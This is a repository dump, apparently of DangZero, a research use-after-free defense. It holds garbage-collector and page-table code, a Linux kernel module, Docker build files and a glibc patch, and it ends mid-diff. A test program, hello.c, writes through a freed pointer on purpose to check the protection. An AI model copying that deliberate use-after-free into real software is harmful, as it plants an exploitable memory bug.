*pte=%lx, cpt=%p cptt=%lu\n", pte, *pte, cpt, *pte & PTE_FRAME); 1168 | bool can_free = sweep_pt_compressed_cpt(cpt, partial_va); 1169 | if (can_free) { 1170 | cpt_free(cpt); 1171 | *pte = PTE_EMPTY; 1172 | } 1173 | return can_free; 1174 | } 1175 | } 1176 | 1177 | static bool sweep_pt_rec(enum pt_level level, pte_t *pt, 1178 | size_t idx_start, size_t idx_end, vaddr_t partial_va) 1179 | { 1180 | size_t num_free_entries = 0; 1181 | size_t i; 1182 | 1183 | for (i = idx_start; i < idx_end; i++) { 1184 | bool is_compressed; 1185 | vaddr_t va; 1186 | 1187 | is_compressed = pte_is_compressed(pt[i], level); 1188 | va = partial_va | (i << pt_level_shift(level)); 1189 | if (level == PT_L4) 1190 | va = sext(va); 1191 | 1192 | // fcg: TODO: not sure 1193 | // va vs highest_shadow 1194 | //if(va >= highest_shadow){ 1195 | // num_free_entries += idx_end - i; 1196 | // break; 1197 | //} 1198 | 1199 | if (level > PT_L1 && (pt[i] & PTE_P) && (pt[i] & PTE_ALIASSES)) { 1200 | pte_t *nextpt = (pte_t*)pt_paddr2vaddr(pt[i] & PTE_FRAME); 1201 | bool can_free = sweep_pt_rec(level - 1, nextpt, 0, PT_NUM_ENTRIES, 1202 | va); 1203 | 1204 | if (can_free) { 1205 | // pp_free_one(pt[i] & PTE_FRAME); 1206 | //LOG("freed a page on level %d\n", level); 1207 | #ifdef __TRACK_MEM_USAGE 1208 | curr_pt_count--; 1209 | #endif 1210 | free_pages((unsigned long)phys_to_virt(pt[i] & PTE_FRAME), 0); 1211 | pt[i] = PTE_EMPTY; 1212 | num_free_entries++; 1213 | } 1214 | } else if (is_compressed) { 1215 | //LOG("compressed = TRUE at level %d\n", level); 1216 | //LOG("i=%lu pt=%p &pt=%p\n", i, pt, &pt); 1217 | bool freed = sweep_pt_compressed_pte(level, &pt[i], va); 1218 | if (freed) 1219 | num_free_entries++; 1220 | } else if ((pt[i] & PTE_INVALIDATED)) { 1221 | bool is_obj_end; 1222 | 1223 | if (level > PT_L1) { 1224 | // LOG("Found invalidated pt at l%d: %lx\n", level, pt[i]); 1225 | //dumpsome(); 1226 | } 1227 | ASSERT0(level == PT_L1); 1228 | 1229 | sweep_curobj_add(va, pt_num_mapped_pages(level)); 1230 | is_obj_end = !!(pt[i] & PTE_OBJEND); 1231 | 1232 | if ((pt[i] & PTE_MARKED)) 1233 | sweep_curobj_marked = 1; 1234 | else if (!sweep_curobj_marked) { 1235 | /* Optimistically clear invalidated status */ 1236 | pt[i] = PTE_EMPTY; 1237 | sweep_curobj_num_cleared++; 1238 | num_free_entries++; 1239 | } 1240 | 1241 | if (is_obj_end) 1242 | sweep_curobj_done(); 1243 | } else if (!(pt[i] & PTE_P)) { 1244 | num_free_entries++; 1245 | } 1246 | 1247 | if (pt[i] & PTE_MARKED && (!is_compressed || (is_compressed && pt[i] & PTE_CMS_ONEBIG))) 1248 | pt[i] &= ~PTE_MARKED; 1249 | } 1250 | return num_free_entries == PT_NUM_ENTRIES; 1251 | } 1252 | 1253 | void build_sub_spans(void) 1254 | { 1255 | /* 1256 | loop through the freelist 1257 | whenever there is a start addr that is bigger than 1258 | the chunk start, point the bucket there 1259 | if the end addr is larger than the next chunk, alias it too 1260 | */ 1261 | 1262 | // empty freelist 1263 | if(opt_freelist == NULL || opt_freelist->items.lh_first == NULL){ 1264 | return; 1265 | } 1266 | 1267 | unsigned b = 0; 1268 | uint64_t bucket_offset = SHADOW_BASE; 1269 | uint64_t bucket_next = SHADOW_BASE+bucket_size; 1270 | struct vp_span *span; 1271 | LIST_FOREACH(span, &opt_freelist->items, freelist){ 1272 | // also check the mega span? 1273 | if((span->start < bucket_offset && span->end > bucket_offset) 1274 | || (span->start >= bucket_offset && span->start < bucket_next)){ 1275 | //if(span->start >= bucket_offset && !(span->end > highest_shadow)){ 1276 | do{ 1277 | //fprintf(stderr, "b=%u (off: %lx): %lx ~ %lx\n", b, bucket_offset, span->start, span->end); 1278 | sub_spans[b] = span; 1279 | //bucket_offset += bucket_size; 1280 | bucket_offset = bucket_next; 1281 | bucket_next += bucket_size; 1282 | b++; 1283 | } while(span->end >= bucket_offset && b < NUM_BUCKETS); 1284 | } 1285 | 1286 | if(b==NUM_BUCKETS-1 || b==NUM_BUCKETS) break; 1287 | } 1288 | } 1289 | 1290 | void gc_run(void) 1291 | { 1292 | // fprintf(stderr, "[Running Garbage Collector!]\n"); 1293 | // MARK 1294 | mark_regs(); 1295 | dangzero_mark_heap(&mark_ptr); // kmod: datasegs, stack, heap, libs 1296 | 1297 | 1298 | #if (NUM_BUCKETS > 1) 1299 | uint64_t shadow_size = highest_shadow - SHADOW_BASE; 1300 | bucket_size = (shadow_size / NUM_BUCKETS) + 0x1000; // round 1301 | 1302 | sub_spans = WM_ALLOC(sizeof(struct vp_span*) * NUM_BUCKETS); 1303 | memset(sub_spans, 0, sizeof(struct vp_span*) * NUM_BUCKETS); 1304 | build_sub_spans(); 1305 | #endif 1306 | 1307 | //fprintf(stderr, "g_freelist=%p\n", g_freelist); 1308 | //fprintf(stderr, "highest_shadow=%lx\n", highest_shadow); 1309 | //fprintf(stderr, "shadow_size=%lx\n", shadow_size); 1310 | //fprintf(stderr, "bucket_size=%lu\n", bucket_size); 1311 | //fflush(stderr); 1312 | 1313 | #ifdef __TRACK_SHADOW_SIZE 1314 | output_shadow_size(false); 1315 | #endif 1316 | 1317 | // SWEEP 1318 | sweep_all(); 1319 | 1320 | #ifdef __TRACK_SHADOW_SIZE 1321 | output_shadow_size(true); 1322 | #endif 1323 | 1324 | #if (NUM_BUCKETS > 1) 1325 | WM_FREE(sub_spans); 1326 | #endif 1327 | } 1328 | 1329 | void gc_init(void) 1330 | { 1331 | uintptr_t stack_bottom; 1332 | uintptr_t stack_ptr = get_stack_pointer(); 1333 | uintptr_t bss_ptr = (uintptr_t)&bss_seg_var; 1334 | uintptr_t data_ptr = (uintptr_t)&data_seg_var; 1335 | 1336 | // printf("gc_init: %lx %lx %lx\n", stack_ptr, bss_ptr, data_ptr); 1337 | 1338 | dangzero_find_vma_bounds(stack_ptr, &stack_bottom, &stack_top); 1339 | dangzero_find_vma_bounds(bss_ptr, &bss_start, &bss_end); 1340 | dangzero_find_vma_bounds(data_ptr, &data_start, &data_end); 1341 | 1342 | // printf("stack: %lx ~ %lx\n", stack_bottom, stack_top); 1343 | // printf("bss: %lx ~ %lx\n", bss_start, bss_end); 1344 | // printf("data: %lx ~ %lx\n", data_start, data_end); 1345 | } 1346 | #endif 1347 | -------------------------------------------------------------------------------- /gc.h: -------------------------------------------------------------------------------- 1 | #ifndef DANGLESS_GC_H 2 | #define DANGLESS_GC_H 3 | #include 4 | 5 | // temp 6 | uint64_t out_cpt_list_size(); 7 | 8 | enum pt_level { 9 | PT_INVALID = 0, 10 | 11 | PT_L1 = 1, 12 | PT_4K = PT_L1, 13 | 14 | PT_L2 = 2, 15 | PT_2M = PT_L2, 16 | 17 | PT_L3 = 3, 18 | PT_1G = PT_L3, 19 | 20 | PT_L4 = 4, 21 | PT_512G = PT_L4, 22 | 23 | PT_NUM_LEVELS = PT_L4 24 | }; 25 | 26 | enum { 27 | PT_BITS_PER_LEVEL = 9u, 28 | 29 | PT_NUM_ENTRIES = 1uL << PT_BITS_PER_LEVEL, 30 | }; 31 | 32 | enum { 33 | PGSHIFT = 12u, 34 | PGSIZE = 1uL << PGSHIFT 35 | }; 36 | 37 | enum pte_flags { 38 | // Flags as defined by the architecture 39 | PTE_P = 1UL << 0, // present 40 | PTE_W = 1UL << 1, // writable 41 | PTE_U = 1UL << 2, // user accessible 42 | PTE_PWT = 1UL << 3, // write-through 43 | PTE_PCD = 1UL << 4, // cache-disable 44 | PTE_A = 1UL << 5, // accessed 45 | PTE_D = 1UL << 6, // dirty 46 | PTE_PS = 1UL << 7, // page-size (in L2/L3) 47 | PTE_G = 1UL << 8, // global 48 | // bits 9..11 ignored 49 | // bits 12..51 page frame/reserved 50 | // bits 52..62 ignored 51 | PTE_NX = 1UL << 63, // non-executable 52 | 53 | // Flags used by dangless (should be ignored bits in arch, although most are 54 | // only set on non-present PTEs generally) 55 | PTE_ALIASSES = 1UL << 8, // child levels are aliasses (>L1, !PS) 56 | PTE_INVALIDATED = 1UL << 9, // invalidated alias (L1..L4) 57 | PTE_OBJEND = 1UL << 10, // object ends at this page (L1) 58 | PTE_MARKED = 1UL << 62, // marked (GC) (L1..L4) 59 | 60 | // Entries pointing to compressed page tables have some more constraints, only 61 | // the lower 6 bits are not used for the cpt pointer. Only valid if !PTE_P. 62 | PTE_COMPRESSED = 1UL << 1, // points to compressed L1PT (2bit cpt) (L2) 63 | PTE_CMS_ONEBIG = 1UL << 3, // cpt consists of 1 obj (no cptp) 64 | PTE_CMS_ALLSMALL = 1UL << 4, // cpt consists of all 4K objs (no cptp) 65 | }; 66 | 67 | enum { 68 | PTE_EMPTY = 0, 69 | }; 70 | 71 | enum { 72 | PTE_FRAME_CPT = 0x000fffffffffffc0UL, 73 | 74 | PTE_FRAME = 0x000ffffffffff000UL, 75 | PTE_FRAME_4K = PTE_FRAME, 76 | PTE_FRAME_L1 = PTE_FRAME_4K, 77 | 78 | PTE_FRAME_2M = 0x000fffffffe00000UL, 79 | PTE_FRAME_L2 = PTE_FRAME_2M, 80 | 81 | PTE_FRAME_1G = 0x000fffffc0000000UL, 82 | PTE_FRAME_L3 = PTE_FRAME_1G, 83 | 84 | }; 85 | 86 | typedef void cpt_t; /* Disallow derefs without explicit cast. */ 87 | enum compression_type { 88 | COMPRESSION_NONE = 0, 89 | COMPRESSION_NORMAL = 1, 90 | COMPRESSION_ONEBIG = 2, 91 | COMPRESSION_ALLSMALL = 3, 92 | }; 93 | 94 | enum cpt_field { 95 | CPT_OBJEND = 0UL, 96 | CPT_INVALIDATED = 1UL, 97 | 98 | CPT_NUM_FIELDS = 2UL 99 | }; 100 | 101 | #define CPT_SIZE_BITS (PT_NUM_ENTRIES * CPT_NUM_FIELDS) 102 | #define CPT_SIZE_BYTES (CPT_SIZE_BITS / 8) 103 | 104 | #define CPT_SLAB_PAGES (1) 105 | #define CPT_SLAB_SIZE (CPT_SLAB_PAGES * PGSIZE) 106 | 107 | typedef int8_t i8; 108 | typedef uint8_t u8; 109 | typedef int16_t i16; 110 | typedef uint16_t u16; 111 | typedef int32_t i32; 112 | typedef uint32_t u32; 113 | typedef int64_t i64; 114 | typedef uint64_t u64; 115 | typedef u64 pte_t; 116 | typedef uintptr_t paddr_t; 117 | typedef uintptr_t vaddr_t; 118 | 119 | #define PG_OFFSET(BASE, NPAGES) \ 120 | ((typeof((BASE)))((uintptr_t)(BASE) + (NPAGES) * PGSIZE)) 121 | 122 | #define FLAG_ISSET(BITSET, BIT) ((bool)((BITSET) & (BIT))) 123 | 124 | typedef int (*proto_dangzero_find_vma_bounds)(uintptr_t ptr, uintptr_t* start, uintptr_t* end); 125 | proto_dangzero_find_vma_bounds dangzero_find_vma_bounds; 126 | typedef void (*proto_dangzero_mark_heap)(void* func_mark_ptr); 127 | proto_dangzero_mark_heap dangzero_mark_heap; 128 | 129 | static inline bool pte_is_compressed(pte_t pte, enum pt_level level) 130 | { 131 | return level == PT_L2 && !(pte & PTE_P) && (pte & PTE_COMPRESSED); 132 | } 133 | 134 | void cpt_nuke(void); 135 | void cpt_destruct(void); 136 | pte_t* uncompress_pte(enum pt_level level, pte_t *pte); 137 | void try_collect_pt(vaddr_t va, size_t npages); 138 | void try_compress_pt(vaddr_t va, size_t npages); 139 | void gc_run(void); 140 | void gc_init(void); 141 | 142 | #endif 143 | -------------------------------------------------------------------------------- /hello.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | int main(){ 5 | int* ptr = malloc(sizeof(int) * 4); 6 | printf("mem obj @ %p\n", ptr); 7 | free(ptr); 8 | /* use-after-free */ 9 | *ptr = 1; 10 | 11 | printf("this should not be reached\n"); 12 | return 0; 13 | } 14 | -------------------------------------------------------------------------------- /kml-image/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:14.04 2 | ARG DEBIAN_FRONTEND=noninteractive 3 | RUN apt update 4 | RUN apt install -y build-essential libncurses-dev bison flex libelf-dev libssl-dev bc wget 5 | RUN mkdir -p /home/kml 6 | WORKDIR /home/kml 7 | RUN wget -O kernel.gz download.vusec.net/dataset/kml-kernel.tar.gz 8 | RUN tar -xf kernel.gz 9 | WORKDIR /home/kml/linux-4.0 10 | RUN make -j`nproc` deb-pkg 11 | -------------------------------------------------------------------------------- /kml-image/build_kml.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | docker build -t kml . 3 | docker container create --name buildkml kml 4 | docker cp buildkml:/home/kml/linux-firmware-image-4.0.0-kml_4.0.0-kml-6_amd64.deb ./ 5 | docker cp buildkml:/home/kml/linux-headers-4.0.0-kml_4.0.0-kml-6_amd64.deb ./ 6 | docker cp buildkml:/home/kml/linux-image-4.0.0-kml-dbg_4.0.0-kml-6_amd64.deb ./ 7 | docker cp buildkml:/home/kml/linux-image-4.0.0-kml_4.0.0-kml-6_amd64.deb ./ 8 | docker cp buildkml:/home/kml/linux-libc-dev_4.0.0-kml-6_amd64.deb ./ 9 | docker cp buildkml:/home/kml/linux-4.0/arch/x86/boot/bzImage ./ 10 | docker container rm -f buildkml 11 | 12 | -------------------------------------------------------------------------------- /kmod/Makefile: -------------------------------------------------------------------------------- 1 | obj-m += dangmod.o 2 | 3 | all: 4 | make -C /lib/modules/4.0.0-kml/build M=$(PWD) modules 5 | 6 | clean: 7 | make -C /lib/modules/4.0.0-kml/build M=$(PWD) clean 8 | -------------------------------------------------------------------------------- /kmod/dangmod.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | #include // for ? 6 | #include // for current 7 | #include // for file name 8 | #include 9 | #include 10 | #include 11 | 12 | MODULE_LICENSE("GPL"); 13 | MODULE_AUTHOR("fcg"); 14 | MODULE_DESCRIPTION("DangZero kmod"); 15 | MODULE_VERSION("0.1"); 16 | 17 | typedef int (*proto_mark_ptr)(uintptr_t ptr); 18 | proto_mark_ptr mark_ptr; 19 | 20 | // cat /proc/kallsyms | grep "test_func" 21 | 22 | // page table indexing 23 | #define _PAGE_MASK 0x000ffffffffff000UL 24 | #define PAGE_MASK_INDEX 0x1FF // 511 25 | #define MAX_PAGE_INDEX 511 26 | #define PML4_INDEX(x) ((x >> 39) & PAGE_MASK_INDEX) 27 | #define PDPT_INDEX(x) ((x >> 30) & PAGE_MASK_INDEX) 28 | #define PDE_INDEX(x) ((x >> 21) & PAGE_MASK_INDEX) 29 | #define PTE_INDEX(x) ((x >> 12) & PAGE_MASK_INDEX) 30 | 31 | //typedef uint64_t phys_addr_t; 32 | #define SHADOW_BASE 0xffff960000000000 33 | #define SHADOW_END 0xffffc87fffffffff 34 | 35 | // arch/x86/include/asm/pgtable_types.h 36 | #define PAGE_PRESENT 1 37 | 38 | // array option (waste space, faster than list) 39 | struct map_pa_va { 40 | uintptr_t pa; 41 | uintptr_t va; 42 | }; 43 | 44 | static inline bool is_potential_ptr(uintptr_t v) 45 | { 46 | return SHADOW_BASE <= v && v <= SHADOW_END; 47 | } 48 | 49 | static uintptr_t* get_table_page(uintptr_t* table, unsigned short index) 50 | { 51 | uintptr_t page = *(table+index); 52 | if(!(page & PAGE_PRESENT)) 53 | return NULL; 54 | 55 | return (uintptr_t*)((page & _PAGE_MASK) + PAGE_OFFSET); 56 | } 57 | 58 | phys_addr_t get_phys_addr_user(uintptr_t addr, uintptr_t* cr3) 59 | { 60 | uintptr_t* page = cr3; 61 | phys_addr_t phys_page; 62 | unsigned short index; 63 | 64 | // level 4 65 | index = PML4_INDEX(addr); 66 | page = get_table_page(page, index); 67 | if(page == NULL) return 0; 68 | 69 | // level 3 70 | index = PDPT_INDEX(addr); 71 | page = get_table_page(page, index); 72 | if(page == NULL) return 0; 73 | 74 | // level 2 75 | index = PDE_INDEX(addr); 76 | page = get_table_page(page, index); 77 | if(page == NULL) return 0; 78 | 79 | // phys page 80 | index = PTE_INDEX(addr); 81 | phys_page = *(page+index); 82 | if(!(phys_page & PAGE_PRESENT)) return 0; 83 | 84 | return phys_page; 85 | } 86 | 87 | 88 | 89 | int dangzero_find_vma_bounds(uintptr_t ptr, uintptr_t* start, uintptr_t* end) 90 | { 91 | struct vm_area_struct *vma = 0; 92 | if(current->mm && current->mm->mmap){ 93 | for(vma = current->mm->mmap; vma; vma = vma->vm_next){ 94 | if(vma->vm_start <= ptr && ptr < vma->vm_end){ 95 | *start = vma->vm_start; 96 | if(stack_guard_page_start(vma, *start)) 97 | *start += PAGE_SIZE; 98 | *end = vma->vm_end; 99 | if(stack_guard_page_end(vma, *end)) 100 | *end -= PAGE_SIZE; 101 | return 1; 102 | } 103 | } 104 | } 105 | return 0; 106 | } 107 | 108 | bool gc_skip_vma(struct vm_area_struct* vma) 109 | { 110 | /* if(vma->vm_start <= vma->vm_mm->brk && 111 | vma->vm_end >= vma->vm_mm->start_brk){ 112 | return false; 113 | } 114 | // if(vma->vm_flags & VM_GROWSDOWN){ 115 | // return false; 116 | // } 117 | return true;*/ 118 | 119 | char *buf, *p; 120 | struct file *file = vma->vm_file; 121 | // vdso 122 | if(!vma->vm_mm){ 123 | return true; 124 | } 125 | 126 | if(file){ 127 | // read-only executable file 128 | if(!(vma->vm_flags & VM_WRITE) && (vma->vm_flags & VM_EXEC)){ 129 | return true; 130 | } 131 | // lazy loaded file 132 | else if(!(vma->vm_flags & (VM_READ | VM_WRITE | VM_EXEC))){ 133 | return true; 134 | } 135 | /* 136 | buf = kmalloc(256, GFP_KERNEL); 137 | p = d_path(&file->f_path, buf, 256); 138 | if(strstr(p, ".so")){ 139 | //printk("skip vma: %s\n", p); 140 | kfree(buf); 141 | return true; 142 | } 143 | kfree(buf);*/ 144 | } 145 | 146 | return false; 147 | } 148 | 149 | bool fork_skip_vma(struct vm_area_struct* vma) 150 | { 151 | /* 152 | // option test: [heap] only 153 | if(vma->vm_start <= vma->vm_mm->brk && 154 | vma->vm_end >= vma->vm_mm->start_brk){ 155 | return false; 156 | } 157 | return true; // all that are not heap 158 | */ 159 | 160 | // vdso 161 | if(!vma->vm_mm){ 162 | return true; 163 | } 164 | // stack 165 | else if(vma->vm_flags & VM_GROWSDOWN){ 166 | return true; 167 | } 168 | // file maps 169 | else if(vma->vm_file){ 170 | // read-only executable file 171 | if(!(vma->vm_flags & VM_WRITE) && (vma->vm_flags & VM_EXEC)){ 172 | return true; 173 | } 174 | // lazy loaded file 175 | else if(!(vma->vm_flags & (VM_READ | VM_WRITE | VM_EXEC))){ 176 | return true; 177 | } 178 | } 179 | 180 | return false; 181 | } 182 | 183 | void dangzero_mark_heap(void* func_mark_ptr) 184 | { 185 | struct vm_area_struct *vma; 186 | uintptr_t *data; 187 | ssize_t i; 188 | unsigned long start, end; 189 | mark_ptr = (proto_mark_ptr)func_mark_ptr; 190 | 191 | if(current->mm && current->mm->mmap){ 192 | for(vma = current->mm->mmap; vma; vma = vma->vm_next){ 193 | if(!gc_skip_vma(vma)){ 194 | 195 | // make sure we dont access guard pages (segfault) 196 | start = vma->vm_start; 197 | if(stack_guard_page_start(vma, start)) 198 | start += PAGE_SIZE; 199 | end = vma->vm_end; 200 | if(stack_guard_page_end(vma, end)) 201 | end -= PAGE_SIZE; 202 | 203 | data = (uintptr_t*) start; 204 | 205 | for(i = 0; i < (end-start)/sizeof(void*); i++){ 206 | if (is_potential_ptr(data[i])){ 207 | mark_ptr(data[i]); 208 | } 209 | } 210 | } 211 | } 212 | } 213 | } 214 | 215 | 216 | struct map_pa_va* dangzero_create_fork_map(uintptr_t* cr3, size_t* num_addrs_ret) 217 | { 218 | struct vm_area_struct *vma = 0; 219 | uintptr_t vpage; 220 | size_t num_pages=0; 221 | size_t num_addrs=0; 222 | 223 | // init struct 224 | struct map_pa_va* addr_map = NULL; 225 | 226 | if(current->mm && current->mm->mmap){ 227 | //printk("current user app: %s\n", current->comm); 228 | 229 | for(vma = current->mm->mmap; vma; vma = vma->vm_next){ 230 | if(!fork_skip_vma(vma)){ 231 | num_pages += (vma->vm_end - vma->vm_start) / PAGE_SIZE; 232 | } 233 | } 234 | 235 | // kmalloc max size is 4MB 236 | // sizeof(struct map_pa_va) == 16 bytes 237 | // max kmalloc can fit 250 000 structs (pages) 238 | // which is 1 GB of mapped memory 239 | 240 | addr_map = kmalloc(sizeof(struct map_pa_va) * num_pages, GFP_KERNEL); 241 | if(addr_map == NULL){ 242 | return NULL; 243 | } 244 | 245 | for(vma = current->mm->mmap; vma; vma = vma->vm_next){ 246 | if(!fork_skip_vma(vma)){ 247 | //printk("%08lx-%08lx\n", vma->vm_start, vma->vm_end); 248 | for(vpage = vma->vm_start; vpage < vma->vm_end; vpage+=PAGE_SIZE){ 249 | phys_addr_t pa = get_phys_addr_user(vpage, cr3); 250 | if(pa != 0){ 251 | //printk("VA %p -> PA %p\n", (void*)vpage, (void*)(pa & PAGE_MASK)); 252 | addr_map[num_addrs].va = vpage; 253 | addr_map[num_addrs].pa = pa & _PAGE_MASK; 254 | num_addrs++; 255 | } 256 | } 257 | } 258 | } 259 | } 260 | 261 | //printk("Result ptr=%p, size addrs=%lu\n", addr_map, num_addrs); 262 | 263 | *num_addrs_ret = num_addrs; 264 | return addr_map; 265 | } 266 | 267 | 268 | 269 | static int __init kmod_init(void) { 270 | printk(KERN_INFO "Init DangZero Kmod.\n"); 271 | return 0; 272 | } 273 | 274 | static void __exit kmod_exit(void) { 275 | printk(KERN_INFO "Exit DangZero Kmod.\n"); 276 | } 277 | 278 | module_init(kmod_init); 279 | module_exit(kmod_exit); 280 | -------------------------------------------------------------------------------- /patchglibc.diff: -------------------------------------------------------------------------------- 1 | diff -urN glibc-2.31_base/elf/dl-map-segments.h glibc-2.31_pre_tls/elf/dl-map-segments.h 2 | --- glibc-2.31_base/elf/dl-map-segments.h 2020-02-01 12:52:50.000000000 +0100 3 | +++ glibc-2.31_pre_tls/elf/dl-map-segments.h 2022-01-28 16:05:45.024133923 +0100 4 | @@ -70,10 +70,14 @@ 5 | unallocated. Then jump into the normal segment-mapping loop to 6 | handle the portion of the segment past the end of the file 7 | mapping. */ 8 | - if (__glibc_unlikely 9 | - (__mprotect ((caddr_t) (l->l_addr + c->mapend), 10 | + // if (__glibc_unlikely 11 | + // (__mprotect ((caddr_t) (l->l_addr + c->mapend), 12 | + // loadcmds[nloadcmds - 1].mapstart - c->mapend, 13 | + // PROT_NONE) < 0)) 14 | +if(__glibc_unlikely(PRE_TLS_INTERNAL_SYSCALL(mprotect, , 3, (caddr_t) (l->l_addr + c->mapend), 15 | loadcmds[nloadcmds - 1].mapstart - c->mapend, 16 | PROT_NONE) < 0)) 17 | + 18 | return DL_MAP_SEGMENTS_ERROR_MPROTECT; 19 | } 20 | 21 | diff -urN glibc-2.31_base/elf/setup-vdso.h glibc-2.31_pre_tls/elf/setup-vdso.h 22 | --- glibc-2.31_base/elf/setup-vdso.h 2020-02-01 12:52:50.000000000 +0100 23 | +++ glibc-2.31_pre_tls/elf/setup-vdso.h 2022-01-25 14:02:10.000000000 +0100 24 | @@ -113,8 +113,10 @@ 25 | /* We have a prelinked DSO preloaded by the system. */ 26 | GLRO(dl_sysinfo_map) = l; 27 | # ifdef NEED_DL_SYSINFO 28 | +#ifndef __x86_64__ 29 | if (GLRO(dl_sysinfo) == DL_SYSINFO_DEFAULT) 30 | GLRO(dl_sysinfo) = GLRO(dl_sysinfo_dso)->e_entry + l->l_addr; 31 | +#endif 32 | # endif 33 | } 34 | #endif 35 | diff -urN glibc-2.31_base/sysdeps/unix/sysv/linux/access.c glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/access.c 36 | --- glibc-2.31_base/sysdeps/unix/sysv/linux/access.c 2020-02-01 12:52:50.000000000 +0100 37 | +++ glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/access.c 2022-01-26 20:44:08.522638460 +0100 38 | @@ -24,7 +24,8 @@ 39 | __access (const char *file, int type) 40 | { 41 | #ifdef __NR_access 42 | - return INLINE_SYSCALL_CALL (access, file, type); 43 | + return PRE_TLS_INLINE_SYSCALL (access, 2, file, type); 44 | + //return INLINE_SYSCALL_CALL (access, file, type); 45 | #else 46 | return INLINE_SYSCALL_CALL (faccessat, AT_FDCWD, file, type); 47 | #endif 48 | diff -urN glibc-2.31_base/sysdeps/unix/sysv/linux/close_nocancel.c glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/close_nocancel.c 49 | --- glibc-2.31_base/sysdeps/unix/sysv/linux/close_nocancel.c 2020-02-01 12:52:50.000000000 +0100 50 | +++ glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/close_nocancel.c 2022-01-26 20:45:26.306502151 +0100 51 | @@ -23,6 +23,7 @@ 52 | int 53 | __close_nocancel (int fd) 54 | { 55 | - return INLINE_SYSCALL_CALL (close, fd); 56 | + return PRE_TLS_INLINE_SYSCALL (close, 1, fd); 57 | + //return INLINE_SYSCALL_CALL (close, fd); 58 | } 59 | libc_hidden_def (__close_nocancel) 60 | diff -urN glibc-2.31_base/sysdeps/unix/sysv/linux/dl-writev.h glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/dl-writev.h 61 | --- glibc-2.31_base/sysdeps/unix/sysv/linux/dl-writev.h 2020-02-01 12:52:50.000000000 +0100 62 | +++ glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/dl-writev.h 2022-01-26 20:47:28.969293412 +0100 63 | @@ -34,5 +34,6 @@ 64 | _dl_writev (int fd, const struct iovec *iov, size_t niov) 65 | { 66 | INTERNAL_SYSCALL_DECL (err); 67 | - INTERNAL_SYSCALL (writev, err, 3, fd, iov, niov); 68 | + PRE_TLS_INTERNAL_SYSCALL (writev, err, 3, fd, iov, niov); 69 | + //INTERNAL_SYSCALL (writev, err, 3, fd, iov, niov); 70 | } 71 | diff -urN glibc-2.31_base/sysdeps/unix/sysv/linux/_exit.c glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/_exit.c 72 | --- glibc-2.31_base/sysdeps/unix/sysv/linux/_exit.c 2020-02-01 12:52:50.000000000 +0100 73 | +++ glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/_exit.c 2022-01-26 20:48:19.062210090 +0100 74 | @@ -28,7 +28,8 @@ 75 | while (1) 76 | { 77 | #ifdef __NR_exit_group 78 | - INLINE_SYSCALL (exit_group, 1, status); 79 | + PRE_TLS_INLINE_SYSCALL (exit_group, 1, status); 80 | + //INLINE_SYSCALL (exit_group, 1, status); 81 | #endif 82 | INLINE_SYSCALL (exit, 1, status); 83 | 84 | diff -urN glibc-2.31_base/sysdeps/unix/sysv/linux/mmap64.c glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/mmap64.c 85 | --- glibc-2.31_base/sysdeps/unix/sysv/linux/mmap64.c 2020-02-01 12:52:50.000000000 +0100 86 | +++ glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/mmap64.c 2022-01-26 21:32:11.573026694 +0100 87 | @@ -56,7 +56,8 @@ 88 | return (void *) MMAP_CALL (mmap2, addr, len, prot, flags, fd, 89 | (off_t) (offset / MMAP2_PAGE_UNIT)); 90 | #else 91 | - return (void *) MMAP_CALL (mmap, addr, len, prot, flags, fd, offset); 92 | + return (void *) PRE_TLS_INLINE_SYSCALL(mmap, 6, addr, len, prot, flags, fd, offset); 93 | + //return (void *) MMAP_CALL (mmap, addr, len, prot, flags, fd, offset); 94 | #endif 95 | } 96 | weak_alias (__mmap64, mmap64) 97 | diff -urN glibc-2.31_base/sysdeps/unix/sysv/linux/open64_nocancel.c glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/open64_nocancel.c 98 | --- glibc-2.31_base/sysdeps/unix/sysv/linux/open64_nocancel.c 2020-02-01 12:52:50.000000000 +0100 99 | +++ glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/open64_nocancel.c 2022-01-26 20:43:27.258712254 +0100 100 | @@ -42,8 +42,8 @@ 101 | va_end (arg); 102 | } 103 | 104 | - return INLINE_SYSCALL_CALL (openat, AT_FDCWD, file, oflag | EXTRA_OPEN_FLAGS, 105 | - mode); 106 | + return PRE_TLS_INLINE_SYSCALL (openat, 4, AT_FDCWD, file, oflag | EXTRA_OPEN_FLAGS, mode); 107 | +// return INLINE_SYSCALL_CALL (openat, AT_FDCWD, file, oflag | EXTRA_OPEN_FLAGS, mode); 108 | } 109 | 110 | hidden_def (__open64_nocancel) 111 | diff -urN glibc-2.31_base/sysdeps/unix/sysv/linux/pread64_nocancel.c glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/pread64_nocancel.c 112 | --- glibc-2.31_base/sysdeps/unix/sysv/linux/pread64_nocancel.c 2020-02-01 12:52:50.000000000 +0100 113 | +++ glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/pread64_nocancel.c 2022-01-26 21:20:52.754299510 +0100 114 | @@ -27,6 +27,7 @@ 115 | ssize_t 116 | __pread64_nocancel (int fd, void *buf, size_t count, off64_t offset) 117 | { 118 | - return INLINE_SYSCALL_CALL (pread64, fd, buf, count, SYSCALL_LL64_PRW (offset)); 119 | + return PRE_TLS_INLINE_SYSCALL (pread64, 4, fd, buf, count, SYSCALL_LL64_PRW (offset)); 120 | + //return INLINE_SYSCALL_CALL (pread64, fd, buf, count, SYSCALL_LL64_PRW (offset)); 121 | } 122 | hidden_def (__pread64_nocancel) 123 | diff -urN glibc-2.31_base/sysdeps/unix/sysv/linux/read_nocancel.c glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/read_nocancel.c 124 | --- glibc-2.31_base/sysdeps/unix/sysv/linux/read_nocancel.c 